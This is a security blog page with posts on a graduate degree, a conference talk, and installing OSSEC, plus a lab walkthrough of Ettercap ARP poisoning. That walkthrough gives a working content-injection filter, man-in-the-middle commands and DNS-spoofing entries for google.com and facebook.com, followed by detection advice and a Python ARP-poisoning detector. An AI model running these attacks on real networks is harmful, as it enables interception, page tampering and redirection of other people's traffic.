Eating Security: Small servings of digital security, incident response, NSM, and system administration. By Nathaniel Richmond (<a href="http://www.blogger.com/profile/16307898781407130985">profile</a>).<br />
<h2>
What I learned when I earned a Masters</h2>
Posted 2019-01-22.<br />
First, a disclaimer. I am employed by CMU, but these views are mine. This is my perspective as a student, but it is impossible to ignore that I am also an employee.<br />
<br />
In 2016, I finally decided to return to school for an MS after getting a BS in Information Systems Management on an Information Assurance track in 2007. In December 2018, I graduated with highest distinction. CMU has a good <a href="https://www.cmu.edu/hr/benefits/tuition/index.html" target="_blank">tuition benefits program</a>, and one of my incentives when I accepted employment was the possibility of graduate school.<br />
<br />
For various reasons, a distance curriculum was best for me, so I ended up taking the GRE and enrolling at Heinz College for an <a href="https://www.heinz.cmu.edu/programs/information-technology-master/information-security-assurance" target="_blank">MSIT: Information Security & Assurance</a>.<br />
<br />
This is the description from CMU's page, "Is MSIT Right For Me?"<br />
<blockquote class="tr_bq">
<i>The Master of Science in Information Technology (MSIT) is a part-time,
distance learning program that is ideal for current IT professionals
seeking to add business acumen, management, and targeted problem-solving
skills to their portfolios. MSIT can also be a great fit for
professionals from less technical areas, such as finance and health
care, who wish to pivot toward technology-intensive roles and improve
their analytical skills.</i> </blockquote>
After completing the program, I would say the description above is fairly accurate and useful. In particular, this degree had a few things that appealed to me.<br />
<ol>
<li>It was at CMU, my employer, so tuition would be free, with the caveat that it counts as taxable income.</li>
<li>It is geared towards working students.</li>
<li>The degree offered some flexibility in focus and electives.</li>
</ol>
The last of these let me choose the Information Security & Assurance track and balance my classes between the business side and technical subjects. Since I can take short technical classes as part of professional development at work, I decided it made sense to focus more on business, management, and leadership, and to spend my technical classes on areas where I wanted to improve or get more depth than professional development classes provide.<br />
<br />
<h3>
Technical classes</h3>
There were a couple of areas involving technology or math where I knew the CMU classes would be challenging and would cover material I wouldn't normally have time to learn through professional development. Some were full-semester classes and some were half-semester classes, called "minis" by Heinz College.<br />
<br />
I focused on a few areas in my technical classes: areas where I thought I could use more formal teaching, that might be directly related to my work, or where justifying professional development would be difficult but the classes would still have some application in my career. The highlights that were most useful for me included the following.<br />
<ul>
<li>An object-oriented programming class using Java.</li>
<li>An economic analysis class that started with more general economics then focused on the economics of IT, including implications for management and strategy. </li>
<li>A useful refresher on statistics covering descriptive statistics, statistical inference, and regression analysis, including applying statistical analysis to analyze IT problems. This also was a prerequisite for some other courses.</li>
<li>Exploring and visualizing data was very relevant to my current job and this class was focused primarily on exploring data sets using R. I had used R previously, but this class let me do a lot more and I enjoyed the final project.</li>
<li>Geographic information systems (GIS) was a very fun course, though I'm not sure I will use a lot of the skills directly. It did help me appreciate how much goes into geographic data analysis and information displays, and it taught me some lessons that apply to information presentation across disciplines.</li>
<li>Penetration testing was probably the class where my motivation for enrolling was closest to, "I want something that will be technical and fun." It was a fun class, but also very tough and frustrating at times when I got stuck on the challenge labs.</li>
</ul>
<h3>
Business, leadership, and policy classes </h3>
The other classes were in areas where I thought I and my career would benefit because I had some experience there but little formal education or knowledge. Examples include:<br />
<ul>
<li>Privacy in the digital age was a great class that, per the syllabus, "...combines technical, economic, legal, and policy perspectives to present a holistic view of its role and value in the digital age." It was a very useful class for anyone in information security given the privacy issues in today's world, many of which have a direct impact on how we do our jobs.</li>
<li>I learned a fair amount about strategy development for organizations and businesses, including useful lessons and the history of creating organizational strategies. The class used case studies really well to show the impact an effective organizational strategy can have.</li>
<li>Almost anyone will improve by taking a good writing class, so I was happy to take business writing for leaders even though I find writing courses somewhat stressful. I'm used to writing many papers, but writing for a writer, the professor in this case, can be intimidating.</li>
<li>Several courses covering information security management, governance, process, policies, and risk management. Most of these were required as part of the Information Security & Assurance focus.</li>
</ul>
This doesn't cover all of my classes, which I think ended up being about 16-18 classes total, mixing full-semester classes and minis.<br />
<br />
<h3>
Do you need a degree or certification?</h3>
Why am I writing about this? Because there is an ongoing discussion throughout the field of information security ("cybersecurity") about the relevance of degrees, certifications, and other credentials. There are also related questions about how people should enter a cybersecurity career. My answer to any question about what someone needs will always be situational. Individual circumstances make a huge difference in any cost/benefit examination of a specific degree or certification. Context is the key to answering questions about career transitions, degrees, and certifications, because no one answer is correct for everyone.<br />
<br />
In my case, the pro-degree arguments, benefits, or positive implications were:<br />
<ul>
<li>I work for a university, so graduate degrees are encouraged and valued.</li>
<li>Employee benefits include free tuition at CMU.</li>
<li>The degree was available online, allowing a flexible school schedule.</li>
<li>The degree offered many classes that were useful towards improving myself as a professional.</li>
<li>I saw the potential to make myself more valuable as a mid- to late career professional.</li>
<li>I saw the potential to refresh skills I already have or learn new skills. </li>
<li>It provided a chance to take some longer-running technical classes that allowed more depth than typical professional development.</li>
</ul>
Some of the costs or drawbacks included:<br />
<ul>
<li>It took a lot of time out of my life. The recommendation was to budget 12 hours per week per class, and that was fairly accurate. Some classes were a little less, some were much more.</li>
<li>Despite the free tuition, it still cost me money in books and tax liability, on top of the time.</li>
<li>It was very stressful for me, particularly since I wasn't satisfied with simply passing but was trying to excel.</li>
<li>A small number of the classes covered fair chunks of material where I already have extensive experience, making them somewhat less interesting.</li>
</ul>
Given all this and more, I think it was the right decision for me. I started seeing the benefit of applying some of my learning at my work while still in school and I expect to continue leveraging some of the material going forward. It also made me examine my career and think more about where I want to go in the future. I could have pursued a more purely technical degree or even more on the business side instead of the mixed program, but I think I made the correct choice for my background and future goals.<br />
<br />
What should you consider when trying to decide about a degree or certifications? I covered a lot of it in my benefits and costs, including time, cost, personal situation, professional situation, goals, and intangibles. I think certifications are generally a good way for earlier career professionals to boost their credentials a bit and I had a number of them when I first entered IT. Some jobs obviously require certifications, making the decision fairly simple. Some certifications are also more useful than others, so that can enter into the equation. The costs and benefits of a degree are generally both more significant but the basic factors to consider are similar.<br />
<br />
For underrepresented groups, degrees and certifications are often much more important because of disparities in opportunities. I got an MCSE, a CCNP, and SANS certifications early in my career, but I was able to get into IT without a degree and before completing any of those certifications. Not everyone, even when capable, will get those opportunities.<br />
<br />
I started in IT nearly 20 years ago, so my analysis entering the field today would also be different. I did three interviews and got three offers when I was looking for my first IT job, but degrees and certifications have become more typical requirements or wants in recent years. None of my old Microsoft and Cisco certifications are current today, and that likely has little impact on my credentials given my experience and degrees. It would likely be a different story if I were still early in my career or switching careers.<br />
<br />
I will also point out that I don't see how having a degree or certification should ever count against someone unless it is literally a scam like a diploma mill. Someone who earnestly earns a well-known and honest certification should not be looked down upon. The MCSE, CCNP, and SANS certifications all taught me a lot and forced me to teach myself in order to pass the exams.<br />
<br />
<h3>
What's next?</h3>
One thing we can probably all agree on is that cybersecurity requires constant learning and change to be successful. The IT environment today is drastically different than when I entered the field. While many of the baseline skills remain constant, the evolution of IT, for example from Windows NT to Active Directory to IT infrastructure in the cloud, means that we had better keep learning so we can adapt our skills to current environments and technologies. For me, the first step is always self-study, reading, and experimentation, but this is not the only answer for developing skills and expertise.<br />
<br />
Since I am done with school, I'll likely be pursuing professional development in technical areas to improve the depth of my skills. This will likely include a certification or two as a way to set a goal and timetable for learning specific topics. General topics like cloud security, cloud architecture, machine learning, security orchestration, edge computing, and mobile computing are all areas that are currently in flux and will require professionals to adapt as the technologies continue maturing. Everyone in cybersecurity needs methods to stay current in the face of changing technology.<br />
<h2>
Reflections on BSidesDC 2014 Talk: Meatspace Indicators and IR</h2>
Posted 2015-03-05.<br />
This is long overdue, but I am finally posting a recap of my <a href="http://www.bsidesdc.org/" target="_blank">BSidesDC</a> talk from October 2014. The talk was based on my previous blog post, <a href="http://eatingsecurity.blogspot.com/2012/06/practical-example-of-non-technical.html" target="_blank">A Practical Example of Non-technical Indicators and Incident Response</a>. For my BSidesDC talk, I tweaked the title slightly to "Meatspace Indicators and Incident Response: A Story From the Lab of Nate Richmond."<br />
<br />
Overall, I think the talk went well. To give people an idea of preparation, I did two dry runs of the talk. The first was for my coworkers, who then gave me valuable feedback on the content and suggestions for improvements. It also gave me a good idea whether the material filled the time I had for my talk. Whether or not you're giving a talk sponsored by your employer, it's a great idea to get feedback from peers before submitting or giving the talk.<br />
<br />
Since the talk used my family as an example, I also did a dry run for them after modifying the content based on the feedback my coworkers gave to me. The main reason to give the talk to my family was to make sure they were all comfortable with what I said during the talk, but also to get some feedback and be fully transparent with them about what I do with our home network.<br />
<br />
I felt slightly guilty about using material from a couple years ago for a conference, but in the end I decided it was still relevant. I think the material was very well-suited for BSides rather than a larger conference.<br />
<br />
I embedded the video from YouTube below. After the video, I have some comments and critiques of my talk that I noted when watching the video. It can be very painful to watch and listen to yourself, particularly for those of us who are driven to be good at the things we do and thus are very critical of ourselves, but it's always important to review what you've done so you can do it better the next time. I definitely missed a few points that I had in my notes and also rushed a bit, finishing 10 minutes early. I probably should have done at least one more dry run.<br />
<br />
I hope it was informative, useful, and entertaining for those that attended or watched later.<br />
<br />
I'd very much like to thank BSidesDC for having me. I enjoyed the conference both as a speaker and an attendee. I highly recommend checking out your local <a href="http://www.securitybsides.com/" target="_blank">BSides</a> if you get the chance. I like their focus on community, collaboration, and keeping the cost for attendees to a minimum.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<iframe width="320" height="266" class="YOUTUBE-iframe-video" data-thumbnail-src="https://ytimg.googleusercontent.com/vi/j0EtpjNWEDU/0.jpg" src="http://www.youtube.com/embed/j0EtpjNWEDU?feature=player_embedded" frameborder="0" allowfullscreen></iframe></div>
<br />
The "Introduction" slide was meant in part to set up a short musing on the stickers people put on the backs of their cars to represent their family. Sorry if you have these, but they really bug me for some reason.<br />
<br />
I think I did emphasize my two main points, which are that security practitioners sometimes forget their goals in terms of supporting the business they're protecting, and that we also can be overly focused on the latest technology when there are many indicators of compromise that require no technology at all.<br />
<br />
If I gave this talk again, I would add a slide after "Additional Context" to show a little more about my home lab architecture. It would have made sense to leverage a little material from my blog posts <a href="http://eatingsecurity.blogspot.com/2013/04/new-home-lab-configuration.html" target="_blank">New Home Lab Configuration</a> and <a href="http://eatingsecurity.blogspot.com/2013/04/home-lab-part-2-vmware-esxi-security.html" target="_blank">Home Lab Part 2</a>. I did have links to these posts in my presentation but forgot to point them out to my audience. I had also intended to point out the evolution of my lab from a stand-alone Sguil installation running on a 700MHz machine with 512MB of RAM, prior to the creation of Security Onion, to its current incarnation using virtual machines on a much faster machine.<br />
<br />
Regarding Terms of Service and expectations of privacy, I firmly believe in what I stated during the presentation. Whether it's a business or personal network, it's very important to let your users know what is expected of them and also what is expected of those monitoring the network. It's also important for those doing network monitoring to properly adhere to these terms. When network monitoring and incident response is part of your job, you should not be taking advantage of your access to root around in people's personal business for fun. You should only be doing what is required to effectively do your job.<br />
<br />
During the discussion of the changing landscape and countermeasures, I forgot to repeat the comments from the audience. This bothers me since I had explicitly reminded myself beforehand to repeat comments so everyone could hear them. If you are ever a presenter and the audience doesn't have microphones, please try to repeat any substantial questions or comments for the rest of the audience.<br />
<br />
Finally, I had some other examples and discussion for the slide about "Why Does This Matter?" but neglected to glance at my notes. The bottom line is that we sometimes get caught up in the mentality of "nuke the entire site from orbit--it's the only way to be sure" rather than examining other possibilities that would still be effective but less disruptive to the business.<br />
<h2>
More Ettercap and ARP Poisoning</h2>
Posted 2013-05-14.<br />
My <a href="http://eatingsecurity.blogspot.com/2011/02/using-ettercap-for-arp-poisoning.html">previous post</a> about <a href="http://ettercap.github.io/ettercap/">Ettercap</a> gets a lot of hits, so I thought I should post a deeper look at some of its features with examples of usage. Before continuing, I'll point out a couple of other good resources, since some of my work builds on that of others.<br />
<br />
Irongeek has a couple of good pages dealing with Ettercap.<br />
<ul>
<li><a href="http://www.irongeek.com/i.php?page=security/ettercapfilter">Fun with Ettercap Filters</a></li>
<li><a href="http://www.irongeek.com/i.php?page=security/arpspoof">The Basics of Arpspoofing/Arppoisoning</a></li>
</ul>
There is plenty more information there if you search his site, plus a number of other sites and forums where you can find information.<br />
<br />
I decided to show a couple of examples, then relate them to NSM and ways to detect ARP poisoning. I happen to be using FreeBSD as the attacking system in this case and a Windows 7 system as the target. For my experiment, I'll use the following image.<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiY6fyoF3OxiszT7_hlfbDGYC8_xkIGRrx3REa6_qTYPRHTwVKJzs_IJ1VuY2xbURrYeT84ni6fPKvPhI0WzKqxF64kU2gmsHGnZ_DoJYd8D4QtS8oGExr17GegwF5sZ9cTxO2ubcDB02yW/s1600/pwned+DH.jpg"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiY6fyoF3OxiszT7_hlfbDGYC8_xkIGRrx3REa6_qTYPRHTwVKJzs_IJ1VuY2xbURrYeT84ni6fPKvPhI0WzKqxF64kU2gmsHGnZ_DoJYd8D4QtS8oGExr17GegwF5sZ9cTxO2ubcDB02yW/s400/pwned+DH.jpg" /></a><br />
<br />
Here is the filter I used to replace the page title and body with my own title and body. It includes segments from Irongeek's filter, so I'll include the GPL notice.<br />
<br />
<pre>############################################################################
#                                                                          #
#  nr.filter -- filter source file                                         #
#  Based on work by Irongeek and others http://www.irongeek.com/           #
#                                                                          #
#  This program is free software; you can redistribute it and/or modify    #
#  it under the terms of the GNU General Public License as published by    #
#  the Free Software Foundation; either version 2 of the License, or       #
#  (at your option) any later version.                                     #
#                                                                          #
############################################################################

# Client -> server: strip compression from the request so the server
# answers with plain HTML that the replace() calls below can match.
if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-Rubbish!");
      # note: replacement string is same length as original string
      msg("zapped Accept-Encoding!\n");
   }
   if (search(DATA.data, "gzip")) {
      replace("gzip", "    ");
      # note: four spaces, again the same length as the original
      msg("whited out gzip!\n");
   }
}

# Server -> client: inject a new title and body, then blank the page's own
# closing title tag and opening body tag. The injected tags use odd casing
# (tITle, bodY, boDY) so that the replace() calls that follow do not match
# them. Double quotes inside a filter string must be escaped with a backslash.
if (ip.proto == TCP && tcp.src == 80) {
   replace("<title>", "<title>PWNED<\/tITle><bodY><p><img src=\"https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiY6fyoF3OxiszT7_hlfbDGYC8_xkIGRrx3REa6_qTYPRHTwVKJzs_IJ1VuY2xbURrYeT84ni6fPKvPhI0WzKqxF64kU2gmsHGnZ_DoJYd8D4QtS8oGExr17GegwF5sZ9cTxO2ubcDB02yW/s400/pwned+DH.jpg\"></p></boDY>");
   replace("<TITLE>", "<title>PWNED<\/tITle><bodY><p><img src=\"https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiY6fyoF3OxiszT7_hlfbDGYC8_xkIGRrx3REa6_qTYPRHTwVKJzs_IJ1VuY2xbURrYeT84ni6fPKvPhI0WzKqxF64kU2gmsHGnZ_DoJYd8D4QtS8oGExr17GegwF5sZ9cTxO2ubcDB02yW/s400/pwned+DH.jpg\"></p></boDY>");
   replace("</title>", " ");
   replace("</TITLE>", " ");
   replace("<body>", " ");
   replace("<BODY>", " ");
   msg("Filter Ran.\n");
}
</pre>
This filter replaces the opening "title" tag with a new title plus a body that links to the image. At the end of the filter, it replaces the original page's closing title tag with a space, since the injected title is already closed, and then replaces the original page's opening body tag with a space to eliminate the body of the page. The mixed-case tags in the injected HTML (tITle, bodY, boDY) are deliberate: replace() matches exact strings, so the later replacements for "</title>" and "<body>" leave the tags the filter just inserted alone. You could also use a pcre_regex command in the filter to more thoroughly remove the existing page body after inserting the image or other content of your choosing. See the etterfilter manual page for more.<br />
<br />
To compile the filter, I simply execute the following:<br />
<pre>$ etterfilter nr.filter -o nr.ef</pre>
<br />
Then to run ettercap on a FreeBSD VM in this example, I execute the following:<br />
<pre>$ sudo ettercap -i em0 -F nr.ef -T -M arp:remote /172.16.126.2/ /172.16.126.131/</pre>
<br />
The "-T" option is to use the text interface rather than the GUI or ncurses. The "-M" executes a man-in-the-middle with the arguments for ARP poisoning that includes the gateway, which is the first IP address in this case. The second IP address is a Windows system.<br />
<br />
Here are some examples of the results if trying to surf using Chrome on the targeted Windows 7 system.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9824YpOu1CLvz2Fcb7DwV2L1cDCHiTu1ThnkF7bfx-o601aBXzIywLrYKbY5gShmRZBeKqHdGvn40OskhEcFqQxs3XXmS3zyuhf0VFEyshXqXP_u8ziILe3EjuLSQcJlu_beqoZ7xzC-Q/s1600/Screen+Shot+2013-04-24+at+18.05.13+PM.png" style="margin-left: auto; margin-right: auto;"><img border="0" height="465" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9824YpOu1CLvz2Fcb7DwV2L1cDCHiTu1ThnkF7bfx-o601aBXzIywLrYKbY5gShmRZBeKqHdGvn40OskhEcFqQxs3XXmS3zyuhf0VFEyshXqXP_u8ziILe3EjuLSQcJlu_beqoZ7xzC-Q/s640/Screen+Shot+2013-04-24+at+18.05.13+PM.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Notice the title is not changed on Slashdot, which means the response contained no literal "<title>" or "<TITLE>" string for the filter to match (a tag with different casing or attributes, or one split across TCP segments, would be missed). The body is also not replaced, just pushed down the page.</td></tr>
</tbody></table>
Here is what Google looks like.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9VvjBp0afrt020BdYcpole7eRPXAFqCSYk4NcqQgf8XBavB7NB72Yiqu6bUOHSPVU5ONlKG7vU6MbXG83ivhtJLGCy01g_2iuWYA9lxfAuL5nzHrSlFddoDxDAFopv6302Mye_z0nLtsk/s1600/Screen+Shot+2013-04-24+at+18.05.49+PM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9VvjBp0afrt020BdYcpole7eRPXAFqCSYk4NcqQgf8XBavB7NB72Yiqu6bUOHSPVU5ONlKG7vU6MbXG83ivhtJLGCy01g_2iuWYA9lxfAuL5nzHrSlFddoDxDAFopv6302Mye_z0nLtsk/s640/Screen+Shot+2013-04-24+at+18.05.49+PM.png" width="520" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Success.</td></tr>
</tbody></table>
<br />
Finally, here is my blog.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj902vYnaG9fFV7mILIkZ2tFM5hxZpQmXHA5cHIw4bZXSH3wfaUK2lMocC4gHo_lzVZJnmxHTbM6_iPAmv2Cfy1R66ROeCuFvN2mtNDlpLTtt3J01uOkZs2K1E5bcwUvkWpz3svlRBBoY78/s1600/Screen+Shot+2013-04-24+at+18.06.11+PM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="450" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj902vYnaG9fFV7mILIkZ2tFM5hxZpQmXHA5cHIw4bZXSH3wfaUK2lMocC4gHo_lzVZJnmxHTbM6_iPAmv2Cfy1R66ROeCuFvN2mtNDlpLTtt3J01uOkZs2K1E5bcwUvkWpz3svlRBBoY78/s640/Screen+Shot+2013-04-24+at+18.06.11+PM.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Success once again. Both the page title and body are replaced.</td></tr>
</tbody></table>
Another way to show how easy it is to redirect traffic to an unexpected site is with ettercap's DNS spoofing plugin. First, I edit /usr/local/share/ettercap/etter.dns and add the following lines.<br />
<br />
<pre>facebook.com A 216.34.181.45
*.facebook.com A 216.34.181.45
www.facebook.com PTR 216.34.181.45
google.com A 131.253.33.200
*.google.com A 131.253.33.200
www.google.com PTR 131.253.33.200</pre>
<br />
Then I run ettercap with the plugin enabled.
<br />
<pre>$ sudo ettercap -i em0 -P dns_spoof -T -M arp:remote /172.16.126.2/ /172.16.126.131/</pre>
<br />
This 20-second video shows what happens when I then try to go to Google or Facebook from the targeted system.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.blogger.com/video.g?token=AD6v5dzte-Y39nNE1EtBdmiAx6s8e5U4Qa_OxSjKiYnNO5CZQJidpAlED7c6i4yLBQIcSLhnwQ3OLOA4lsJ021svjg' class='b-hbp-video b-uploaded' frameborder='0'></iframe></div>
<br />
This can be fairly amusing, particularly if you are on a lab network where shenanigans are not only acceptable but expected. On the other hand, imagine injecting something more malicious than a funny image, like a malicious iframe or malicious JavaScript. I played around with injecting JavaScript into pages, and it really is trivial if you're in a position to poison the network gateway. A good old-fashioned Rickroll is another good way to demonstrate the attack in a non-malicious way.<br />
<br />
As I mentioned in a <a href="http://eatingsecurity.blogspot.com/2011/02/using-ettercap-for-arp-poisoning.html">previous post about ettercap</a>, <a href="http://www.zdnet.com/blog/security/metasploit-projects-site-hijacked-through-arp-poisoning/1242">the Metasploit site was briefly owned</a> through ARP poisoning in 2008. It is an old-school attack that can still be quite effective if you have access to a system on the same network segment as another system you want to attack.<br />
<br />
Defenses against ARP poisoning are fairly simple to describe but not necessarily practical or easy to implement. The first, mentioned in the Metasploit article, is using static ARP entries so that a host no longer relies on ARP replies for those addresses. This may be simple in the case of a single gateway entry, but the larger the network, the more administrative overhead static ARP entries require.<br />
<br />
You can also use software to detect ARP poisoning, for example <a href="http://ee.lbl.gov/">LBNL's arpwatch</a>, which records IP-to-MAC pairings and reports when a pairing changes. Any software that shows MAC addresses along with IP addresses can potentially be used to detect poisoning, since you would see the same IP address claimed by multiple MAC addresses, or one MAC address claiming several IP addresses. For example, here is what my ARP poisoning with ettercap looks like in Wireshark.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIx7dSp-w73SX_SstbkxN-QCDsR7ECH_obC-7OXv_6WO6ChydMH_YWZTJZkgeHwhyphenhyphen-PN6hIeAEbtOmwFn8GcGMMtGjXNFry_vJBpblU5OlB0BWf25CaWuWijdD0LsiTP1UchFyoQizos4X/s1600/duplicate_IP.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="27" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIx7dSp-w73SX_SstbkxN-QCDsR7ECH_obC-7OXv_6WO6ChydMH_YWZTJZkgeHwhyphenhyphen-PN6hIeAEbtOmwFn8GcGMMtGjXNFry_vJBpblU5OlB0BWf25CaWuWijdD0LsiTP1UchFyoQizos4X/s640/duplicate_IP.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">You can see that the poisoner, 00:0c:29:6d:92:78, is associated with both IP addresses.</td></tr>
</tbody></table>
So, it is easy to see in the traffic, but that doesn't mean it is easy to detect without some analyst intervention. Snort has an <a href="http://manual.snort.org/node17.html#SECTION003214000000000000000">ARP spoofing preprocessor</a>, but an IDS will often be in the wrong position on a network to see ARP traffic: ARP does not cross routers, so a sensor watching a span of the border or core link only sees ARP for its own segment. Most networks are probably not instrumented so that ARP traffic reaches an NSM sensor at all. It is not difficult in a technical sense, but it does require resources to run internal sensors and to make sure the network is architected so the sensors have visibility. There are probably more efficient ways to allocate detection resources in this case.<br />
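To make the "same IP, two MACs" check from the Wireshark screenshot concrete, here is an added detector written for this page; it is not code from the original post, from ettercap, or from arpwatch. It reads a list of ARP packets and raises three kinds of alert: a reply nobody asked for, an IP whose MAC binding changes (what arpwatch reports as a changed ethernet address), and one MAC claiming the gateway IP plus another host's IP, which is exactly what <code>-M arp:remote</code> produces. The gateway (172.16.126.2), victim (172.16.126.131) and poisoner MAC (00:0c:29:6d:92:78) come from the post; the other MAC addresses and the timestamps in the sample capture are constructed for the example.<br />

```python
"""Detect ARP poisoning from a sequence of ARP packets (added example)."""
from collections import defaultdict
from typing import Iterable, List, NamedTuple, Tuple

REQUEST, REPLY = 1, 2
GATEWAY_IP = "172.16.126.2"            # first target in the post's ettercap command


class Arp(NamedTuple):
    ts: float          # seconds since capture start
    op: int            # 1 = request, 2 = reply
    sender_mac: str
    sender_ip: str
    target_mac: str
    target_ip: str


def detect_arp_poisoning(packets: Iterable[Arp], gateway_ip: str = GATEWAY_IP,
                         window: float = 2.0) -> List[Tuple[float, str, str]]:
    """Return (ts, kind, detail) alerts in capture order.

    unsolicited  a reply with no matching request in the last `window` seconds
                 (ettercap keeps re-sending these to hold the poison in place)
    mac-change   an IP previously bound to one MAC is now claimed by another
    gateway-dup  one MAC claims the gateway IP and at least one other IP,
                 the classic signature of a host inserting itself as MITM
    """
    alerts: List[Tuple[float, str, str]] = []
    ip_to_mac = {}                         # learned IP -> MAC bindings
    mac_to_ips = defaultdict(set)          # MAC -> set of IPs it has claimed
    pending = {}                           # (asker MAC, wanted IP) -> ts of request
    flagged_macs = set()                   # MACs already reported as gateway-dup

    for p in sorted(packets, key=lambda x: x.ts):
        if p.op == REQUEST:
            pending[(p.sender_mac, p.target_ip)] = p.ts
        elif p.op == REPLY:
            # Gratuitous ARP (sender == target IP) is normal at boot; it still
            # passes through the mac-change check below, just not this one.
            gratuitous = p.sender_ip == p.target_ip
            asked = pending.get((p.target_mac, p.sender_ip))
            if not gratuitous and (asked is None or p.ts - asked > window):
                alerts.append((p.ts, "unsolicited",
                               f"{p.sender_ip} is-at {p.sender_mac} sent to {p.target_mac}"))
        else:
            continue                       # not an opcode we track

        # Both requests and replies carry a sender binding, and a poisoner can
        # use either opcode, so learn from both.
        prev = ip_to_mac.get(p.sender_ip)
        if prev is not None and prev != p.sender_mac:
            alerts.append((p.ts, "mac-change", f"{p.sender_ip}: {prev} -> {p.sender_mac}"))
        ip_to_mac[p.sender_ip] = p.sender_mac
        mac_to_ips[p.sender_mac].add(p.sender_ip)

        claimed = mac_to_ips[p.sender_mac]
        if gateway_ip in claimed and len(claimed) > 1 and p.sender_mac not in flagged_macs:
            flagged_macs.add(p.sender_mac)
            alerts.append((p.ts, "gateway-dup",
                           f"{p.sender_mac} claims {', '.join(sorted(claimed))}"))
    return alerts


# Constructed sample capture mirroring the post's lab. Only the poisoner MAC
# (from the Wireshark caption) and the two IPs come from the post.
VICTIM_MAC, VICTIM_IP = "00:0c:29:aa:aa:aa", "172.16.126.131"   # MAC made up
REAL_GW_MAC = "00:50:56:e9:11:22"                                 # MAC made up
POISONER_MAC = "00:0c:29:6d:92:78"
ZERO_MAC = "00:00:00:00:00:00"

SAMPLE_CAPTURE = [
    # Normal resolution: the victim asks for the gateway and the gateway answers.
    Arp(0.000, REQUEST, VICTIM_MAC, VICTIM_IP, ZERO_MAC, GATEWAY_IP),
    Arp(0.001, REPLY, REAL_GW_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP),
    # Poisoning starts: the attacker tells the victim it is the gateway and
    # tells the gateway it is the victim, without either having asked.
    Arp(5.000, REPLY, POISONER_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP),
    Arp(5.010, REPLY, POISONER_MAC, VICTIM_IP, REAL_GW_MAC, GATEWAY_IP),
]

if __name__ == "__main__":
    for ts, kind, detail in detect_arp_poisoning(SAMPLE_CAPTURE):
        print(f"{ts:8.3f}  {kind:<12}  {detail}")
```

Run against the sample, the first two packets produce nothing and the two poisoned replies produce two "unsolicited" alerts, two "mac-change" alerts and one "gateway-dup". The unsolicited rule is the noisiest of the three on a real segment (any host that missed a request will trip it), so in practice the mac-change and gateway-dup alerts are the ones worth paging on.<br />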
<br />
There are still other methods to help detect and prevent ARP spoofing, particularly with network equipment like managed switches. Jeremy Stretch has a good write-up on <a href="http://packetlife.net/blog/2010/aug/18/dhcp-snooping-and-dynamic-arp-inspection/">DHCP Snooping and Dynamic Arp Inspection</a> over at his PacketLife blog showing exactly how DAI can be used to prevent and detect ARP poisoning. You can also read about <a href="http://www.cisco.com/en/US/docs/switches/lan/catalyst6500/ios/12.2SX/configuration/guide/snoodhcp.html">DHCP Snooping</a> and <a href="http://www.cisco.com/en/US/docs/switches/lan/catalyst6500/ios/12.2SX/configuration/guide/dynarp.html">DAI</a> on Cisco's site. This seems like it may be an easier method than IDS deployments since networking equipment is already positioned to see ARP traffic, but it does require equipment that supports ARP inspection.<br />
<br />
I had originally thought of also showing how you could combine Ettercap with Metasploit to inject malicious traffic in the above examples, but I decided that would overly complicate this post. It is probably better reserved for a future post.<br />
<h2>
Installing OSSEC agent</h2>
Posted 2013-05-01.<br />
With the recent news about the latest <a href="http://www.welivesecurity.com/2013/04/26/linuxcdorked-new-apache-backdoor-in-the-wild-serves-blackhole/">Apache backdoor</a> on systems using cPanel, I thought it would be pertinent to show the process of adding an <a href="http://www.ossec.net/">OSSEC</a> agent that connects to a Security Onion server. Why is this relevant? Because OSSEC and other file integrity checkers can detect changes to binaries like Apache's httpd.<br />
<blockquote class="tr_bq">
"OSSEC is an Open Source Host-based Intrusion Detection System that performs log analysis, file integrity checking, policy monitoring, rootkit detection, real-time alerting and active response."</blockquote>
Many systems include integrity checking programs in their default installs these days, for instance Red Hat with <a href="http://aide.sourceforge.net/">AIDE</a>. AIDE is also available in repositories for a number of other Linux distributions plus FreeBSD.<br />
<br />
